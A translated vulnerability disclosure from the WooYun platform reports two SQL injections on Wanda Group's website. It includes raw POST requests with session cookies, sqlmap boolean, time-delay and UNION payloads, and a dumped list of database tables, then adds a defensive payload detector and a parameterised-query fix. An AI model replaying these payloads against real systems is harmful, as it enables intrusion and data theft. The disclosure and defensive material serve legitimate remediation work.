Vulnerability summary

Defect ID: wooyun-2015-0132136

Title: Two POST-based SQL injections on the official website of Dalian Wanda Group Co., Ltd. (bundled)

Vendor: Dalian Wanda Group Co., Ltd. (大连万达集团股份有限公司)

Author: 百度流氓

Submitted: 2015-08-06 16:13

Fixed: 2015-09-20 16:48

Published: 2015-09-20 16:48

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-06: Details sent to the vendor; awaiting vendor response
2015-08-06: Vendor confirmed; details visible to the vendor only
2015-08-16: Details disclosed to core white hats and domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

Two POST-based SQL injections on the official website of Dalian Wanda Group Co., Ltd., reported together.

Detailed description:

Request 1:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

City=1169&DictionaryID=LY&type=GetProJectList


Request 2:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Province=fWqPza1t&type=getCity

Proof:

1.

[Screenshot: QQ截图20150806150248.jpg]


2.

[Screenshot: QQ截图20150806150616.jpg]


Screenshots are too much hassle, so I'll just paste the logs directly.
1.

sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: DictionaryID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'
current database: 'ksfw'
Database: ksfw
[267 tables]
+---------------------------------+
| AL_ADD_APPLY |
| AL_AUDIT_LOG |
| AL_CATE |
| AL_CONTENT |
| AL_CONTENT_CATE |
| AL_CONT_DETAIL |
| AU_ACCREDIT_DATA |
| AU_ACCREDIT_FUNC |
| AU_ACCREDIT_MENU |
| CONT_HANDEL_LOG |
| CUS_ASSIGN_LOG |
| CUS_BL |
| CUS_BLACKLIST |
| CUS_BL_APPLY |
| CUS_BL_CONTACT |
| CUS_BL_INTERVAL |
| CUS_BL_LOG |
| CUS_BL_PHONE |
| CUS_CONTACT |
| CUS_CONT_INFO |
| CUS_CONT_TYPE |
| CUS_DOM |
| CUS_HOBBY |
| CUS_INFO |
| CUS_OR_CONTACT |
| CUS_QU_CONTACT |
| CUS_RECOMMEND |
| CUS_SPEC_EVENT |
| ComplaintPlazaView |
| EHR_EMPLOYEE_ORG_REL_TEMP |
| EHR_EMPLOYEE_POS_REL_TEMP |
| EHR_EMPLOYEE_TEMP |
| EHR_ORGNIZATION_TEMP |
| EHR_POSITION_TEMP |
| EMPLOYEE_ORG_REL |
| FAC_TS_ATTR_DETAIL |
| FAC_TS_ATTR_DETAIL_POEP |
| FAC_TS_CONT_DETAIL |
| FAC_TS_DEAL_TIME_DETAIL |
| FAC_TS_KM_COUNT_DAY |
| FAC_TS_OPER_DETAIL |
| FAC_TS_QD_COUNT_DAY |
| FAC_TS_YJ_DETAIL |
| FAC_TS_ZDY_ATTR_DETAIL |
| FAC_ZJ_CONTACT_HZ_VIEW |
| FAC_ZJ_CONTACT_INFO_VIEW |
| HW_CTICONFIG |
| HW_DUTYMANAGE |
| HW_DUTY_EMP |
| HW_SEATACCREDIT |
| HW_SKILLGROUP |
| HW_SKILLSEAT |
| HW_SKILL_SEAT |
| IMS_BASIC_REPLY |
| IM_NEWS |
| IM_NEWS_REAL_RECEIVER |
| IM_NEWS_RECEIVER |
| IVR_CITY_YETAI |
| IVR_MOBILE_TELEPHONE_MAPPING |
| IVR_OFFLINE_TO_MOBILE |
| IVR_TELEPHONE_AREA_MAPPING |
| IVR_VIP_EMP |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROP |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USER |
| JBPM4_JOB |
| JBPM4_LOB |
| JBPM4_PARTICIPATION |
| JBPM4_PROPERTY |
| JBPM4_SWIMLANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| KM_BASEINFO |
| KM_CATE |
| KM_EVAL |
| KM_INFO_REL |
| KN_SUBJECT_CATE |
| KN_SUBJECT_ITEM |
| KN_SURVEY |
| KN_SURVEY_ANSWER |
| KN_SURVEY_R_SUBJECT |
| KN_SURVEY_SUBJECT |
| OAMQMessages |
| OB_ACTIV_BASE |
| OB_ACTIV_OPELOG |
| OB_ACTIV_RULE |
| OB_ASSIGN_ROLE |
| OB_ASSIGN_SET |
| OB_CONTACT_ITEM |
| OB_CONTACT_SET |
| OB_CUS_ATTRI |
| OB_CUS_TEMPL |
| OB_PERMIT_TIME |
| OB_PROJ_BASE |
| OB_PROJ_OPELOG |
| OB_STAGE_BASE |
| OB_STAGE_ITEM |
| ONLINE_CONTACT |
| ONLINE_CONTACT_READ_LOG |
| ONLINE_CONTACT_RECEIVER |
| OP_CT_COLLECT |
| OP_CT_NOTICE |
| OP_CT_NOTICE_READ_LOG |
| OP_CT_NOTICE_RECEIVER |
| ORGNIZATION |
| QD_WHITE_LIST |
| REC_SYN_SMS |
| REL_SPLIT_TYPE |
| RP_CMS_SKILL_HOUR |
| SHEET |
| SHEET_BACK |
| SHEET_CONSULT |
| SHEET_REMINDER |
| SHEET_REPAIRS |
| SHEET_TS |
| SHEET_VOID |
| SYS_ATTACHMENT |
| SYS_BP_ITEM |
| SYS_BP_TYPE |
| SYS_CONTACT_ADDR |
| SYS_DEPARTMENT |
| SYS_DIC |
| SYS_DIC_ITEM |
| SYS_EMP |
| SYS_EMPLOYEE |
| SYS_GROUP |
| SYS_HANDLE_LOG |
| SYS_HOLIDAY |
| SYS_LOG_OPERATE |
| SYS_MENU |
| SYS_MENU_NAV |
| SYS_OPRITION_LOG |
| SYS_ORG_ROLE |
| SYS_PASSWORD_POLICY |
| SYS_REGION |
| SYS_RESOURCE |
| SYS_ROLE |
| SYS_ROLE_CATE |
| SYS_ROLE_EMP |
| SYS_ROLE_GROUP |
| SYS_ROLE_MENU |
| SYS_ROLE_PARAM |
| SYS_ROLE_USER |
| SYS_SP_ITEM |
| SYS_SP_TYPE |
| SYS_TENEMENT |
| SYS_TENEMENT_DOC |
| SYS_USER |
| SYS_USER_GROUP |
| SYS_USER_LOGIN_LOG |
| SYS_WORKTIME |
| TOOL_NOTE |
| TSM_Messages |
| Temp_Organizations |
| WC_ACCOUNT |
| WC_FANS |
| WC_FANS_GROUP |
| WC_ISSUE |
| WC_MATERIAL_API |
| WC_MATERIAL_PICTURE |
| WC_MATERIAL_VOICE |
| WC_MEMBER |
| WC_MEMBER_GROUP |
| WC_MENU |
| WC_MSG_SEND |
| WC_REPLY_RULE |
| WC_REPLY_TEXT |
| WC_REPLY_VIDEO |
| WC_RULE_KEYWORD |
| WC_RULE_REPLY |
| WC_USER_BINDING |
| WD_MASS_HANDLE |
| WD_MASS_INCIDENT |
| WD_MASS_TASK |
| WD_ORDERHANDLE |
| WD_SG |
| WD_TS_SHEET |
| WD_WEBORDER |
| WD_YQJK |
| WFE_APPROVE_LOG |
| WFE_BEFORE_LOG |
| WFE_HANDLE_APPLY |
| WFE_REMINDER_LOG |
| WFE_SHEET |
| WFE_SHIFT_LOG |
| WFE_TODO |
| WFE_TODO_ASSIGNMENT |
| WFE_UPGRADE_LOG |
| WFE_URGE |
| WF_AR_NOTICE_LOG |
| WF_AR_NOTICE_LOG_20150420before |
| WF_AR_NOTICE_LOG_CURR_temp |
| WF_AR_NOTICE_LOG_temp |
| WF_AR_RE_LOG |
| WF_Add_DATA |
| WF_FLOW_CATE |
| WF_FLOW_INFO |
| WF_FLOW_VARIABLE |
| WF_NODE |
| WF_NODE_ALERT |
| WF_NODE_ALTER_REG |
| WF_NODE_CONDITION |
| WF_NODE_EXEC_REG |
| WF_NODE_NOTICE |
| WF_NODE_ROLE |
| WF_NODE_TIME |
| WF_SHEEP_ASSOCIATED |
| WF_SHEET_ASSOCIATED |
| WSQ_BUILDING |
| WSQ_COMMUNITY |
| WSQ_FAN_CUS |
| WSQ_ROOM |
| WSQ_UNIT |
| Wanda_RT_CONTRACT |
| ZJ_BATCH_BASE |
| ZJ_BATCH_CONTACT |
| ZJ_BATCH_DF |
| ZJ_BATCH_RULE |
| ZJ_BATCH_SF |
| ZJ_BATCH_SHEET |
| ZJ_CONT_ITEM |
| ZJ_CONT_ITEM_KPI |
| ZJ_CONT_ITEM_KPI_PUBLISH |
| ZJ_CONT_ITEM_PUBLISH |
| ZJ_EVAL_BASE |
| ZJ_EVAL_CHECK |
| ZJ_EVAL_ITEM |
| ZJ_EVAL_S_BASE |
| ZJ_EVAL_S_RULE |
| ZJ_EXAMRULE_CONT |
| ZJ_EXAM_RULE |
| ZJ_PROJ_BASE |
| ZJ_PROJ_ROLE |
| ZJ_REF |
| ZJ_REF_CONT |
| ZJ_REF_DEPT |
| ZJ_REVIEW |
| ZJ_TEMPL |
| ZJ_TEMPL_BASE |
| ZJ_TEMPL_ITEM |
| ZJ_TEMPL_ITEM_KPI |
| ZJ_TEMPL_KPI |
| ZJ_TEMPL_PUBLISH |
| ZJ_TEMP_CONT |
| ZJ_TEMP_CONT_PUBLISH |
| ZJ_THRES |
| ZJ_THRES_BASE |
| ZJ_THRES_RULE |
| ZJ_ZJDF_JZITEM_LOG |
| ZJ_ZJRW |
| ZJ_ZJRW_ASSIGN_LOG |
| ZJ_ZJRW_ROLE |
| ZJ_test1 |
| rec_syn_cms |
| unEmpForRole |
| unEmpInfoForRole |
| wsq_commu_cus |
| wsq_zutuan |
| 查询 |
+---------------------------------+


2.

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: Province (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'
current database: 'ksfw'
Database: ksfw
[267 tables] (the same 267 tables listed under injection point 1 above)


I won't go any further than this; the log speaks for itself.
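The sqlmap output above shows three payload families against the same api.php endpoint: a boolean tautology (`' AND 3158=3158 AND 'hNyR'='hNyR`), a stacked `WAITFOR DELAY` time probe, and a two-column `UNION ALL SELECT`. For the defender side, the following is an added example, not part of the report or of Wanda's code: a small Python checker that percent-decodes an application/x-www-form-urlencoded body and flags parameters whose values match those families. The sample bodies are constructed from the two baseline requests and the payloads shown above; one payload is re-encoded the way a browser or tool would actually send it, and the UNION sample's CHAR() chain is shortened.

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the report. Signatures cover the three payload
# families sqlmap reported against api.php; match order is the dict order.
SIGNATURES = {
    "boolean_tautology": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "stacked_time_delay": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "comment_terminator": re.compile(r"(?:--|/\*)\s*$"),
}


def parse_form(body):
    """Split a form body on '&' and the first '=' of each pair, then percent-decode
    both sides, so encoded payloads (%27, +) are inspected the way the database sees them.
    Splitting is done by hand so ';' inside a payload is never treated as a separator."""
    params = []
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def scan_body(body):
    """Return {parameter: [matched signature names]} for every suspicious value."""
    hits = {}
    for name, value in parse_form(body):
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


# Constructed sample bodies: the report's two baseline requests, its sqlmap payloads
# (UNION sample shortened), and one payload percent-encoded as sent on the wire.
# Note: unquote_plus turns a literal '+' into a space, so a real client must send
# the '+' in CHAR(113)+CHAR(120) as %2B for SQL Server to see it as concatenation.
SAMPLES = {
    "baseline_1": "City=1169&DictionaryID=LY&type=GetProJectList",
    "baseline_2": "Province=fWqPza1t&type=getCity",
    "boolean": "City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList",
    "stacked": "City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList",
    "union": "Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120),NULL-- &type=getCity",
    "stacked_encoded": "City=1169&DictionaryID=LY%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&type=GetProJectList",
}


def scan_samples():
    """Run the checker over every constructed sample and return the results by label."""
    return {label: scan_body(body) for label, body in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:16} {hits or 'clean'}")
```

Two caveats for anyone wiring this into monitoring: nginx access logs do not record POST bodies by default, so the body has to come from a WAF, a reverse proxy with request-body logging, or application-level logging; and signature matching is a triage aid that sqlmap's tamper scripts (case changes, inline comments, alternative whitespace) can evade, so it is never a substitute for fixing the query itself.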

Suggested fix:

Three injections in a single api.php; I'm speechless.
The gurus are at Wanda, you know this better than I do.........
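The report leaves the fix to the vendor. Two points from the sqlmap output matter for that fix: sqlmap confirmed stacked queries, so whatever the `ksfw_user` connection is allowed to do, an attacker can do with an appended statement, not just read rows; and every technique listed depends on user input being spliced into the SQL text. The remedy is bound parameters. The following is an added example, not code from the report or from the site: SQLite stands in for SQL Server 2008, and the `ProjectList`/`Creds` tables are constructed, since the query behind `op=feedback&type=GetProJectList` is not shown and is assumed here. It demonstrates why the boolean-based payload works (a true versus false condition changes the row count, which is the oracle sqlmap used to extract the user and database names), how the two-column UNION payload pulls rows from another table, and that the parameterised version treats both payloads as plain string values. SQLite's `execute()` refuses multiple statements, so the stacked `WAITFOR DELAY` technique is not reproduced.

```python
import sqlite3

# Added example, not code from the report. SQLite stands in for the SQL Server 2008
# back end; table, column and row contents below are constructed for an offline demo.
TRUE_PAYLOAD = "LY' AND 3158=3158 AND 'hNyR'='hNyR"    # boolean payload from the report
FALSE_PAYLOAD = "LY' AND 3158=3159 AND 'hNyR'='hNyR"   # same shape, false condition
UNION_PAYLOAD = "LY' UNION ALL SELECT Name, Secret FROM Creds-- "  # 2 columns, like sqlmap's


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE ProjectList (City INTEGER, DictionaryID TEXT, Name TEXT);
        INSERT INTO ProjectList VALUES (1169, 'LY', 'project-a');
        INSERT INTO ProjectList VALUES (1169, 'LY', 'project-b');
        INSERT INTO ProjectList VALUES (1169, 'QT', 'project-c');
        CREATE TABLE Creds (Name TEXT, Secret TEXT);
        INSERT INTO Creds VALUES ('admin', 'constructed-secret');
    """)
    return con


def get_project_list_vulnerable(con, city, dictionary_id):
    """Splices form values into the SQL text: the bug class behind the report.
    On SQL Server the same pattern also allows ';WAITFOR DELAY' stacked statements."""
    sql = ("SELECT Name, City FROM ProjectList "
           "WHERE City = %s AND DictionaryID = '%s'" % (city, dictionary_id))
    return con.execute(sql).fetchall()


def get_project_list_safe(con, city, dictionary_id):
    """Same query with bound parameters: the driver ships values separately from the
    statement, so quotes and keywords in the input can never change its structure.
    City arrives as form text, so it is validated as an integer before binding."""
    sql = "SELECT Name, City FROM ProjectList WHERE City = ? AND DictionaryID = ?"
    return con.execute(sql, (int(city), dictionary_id)).fetchall()


def demo():
    con = make_db()
    return {
        # Boolean-based blind: true/false payloads give different row counts (the oracle).
        "vuln_baseline": len(get_project_list_vulnerable(con, 1169, "LY")),
        "vuln_blind_true": len(get_project_list_vulnerable(con, 1169, TRUE_PAYLOAD)),
        "vuln_blind_false": len(get_project_list_vulnerable(con, 1169, FALSE_PAYLOAD)),
        # UNION query: a second SELECT with a matching column count appends foreign rows.
        "vuln_union_rows": get_project_list_vulnerable(con, 1169, UNION_PAYLOAD),
        # Parameterised version: the payloads are just DictionaryID values that match nothing.
        "safe_baseline": len(get_project_list_safe(con, 1169, "LY")),
        "safe_blind_true": len(get_project_list_safe(con, 1169, TRUE_PAYLOAD)),
        "safe_union": len(get_project_list_safe(con, 1169, UNION_PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In the PHP 5.3 stack the report identifies, the equivalent is PDO or sqlsrv prepared statements with bound parameters on every value taken from the request; whitelisting `type` against the known operations and casting `City` to an integer close the remaining non-string inputs. Reviewing what `ksfw_user` is permitted to do is the second half of the fix, since stacked queries turn any excess grant into attacker capability.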

Copyright notice: when reposting, credit the source: 百度流氓@乌云


Vendor response

Vendor reply:

Severity: High

Rank: 12

Confirmed: 2015-08-06 16:47

Vendor comment:

Thanks to 百度流氓 for the continued attention and contributions! We will notify the business unit to remediate right away!

Latest status:

None yet


Comments

  1. 2015-08-06 16:37 | 牛 小 帅 (regular white hat | Rank: 363 | vulns: 84)

    @百度流氓 Found two more, huh? One yesterday.

  2. 2015-08-06 16:40 | 百度流氓 (passer-by | Rank: 28 | vulns: 4)

    @牛 小 帅 Yeah, Wanda is a genuinely good vendor, so I'm putting some effort into Wanda.

  3. 2015-08-06 16:41 | 牛 小 帅 (regular white hat | Rank: 363 | vulns: 84)

    @百度流氓 That was fast, haha.

  4. 2015-08-06 17:10 | zeracker, verified white hat (core white hat | Rank: 1068 | vulns: 137)

    The vendor won "most reliable vendor"; looks like gift cards are on the way @万达

  5. 2015-08-06 17:15 | 牛 小 帅 (regular white hat | Rank: 363 | vulns: 84)

    @zeracker My 芒果 page shows a gift has been sent to me, but it seems they don't even have my contact details.

  6. 2015-08-06 17:19 | 百度流氓 (passer-by | Rank: 28 | vulns: 4)

    @牛 小 帅 .....

  7. 2015-08-06 17:21 | 牛 小 帅 (regular white hat | Rank: 363 | vulns: 84)

    @百度流氓 My bad, I am sorry.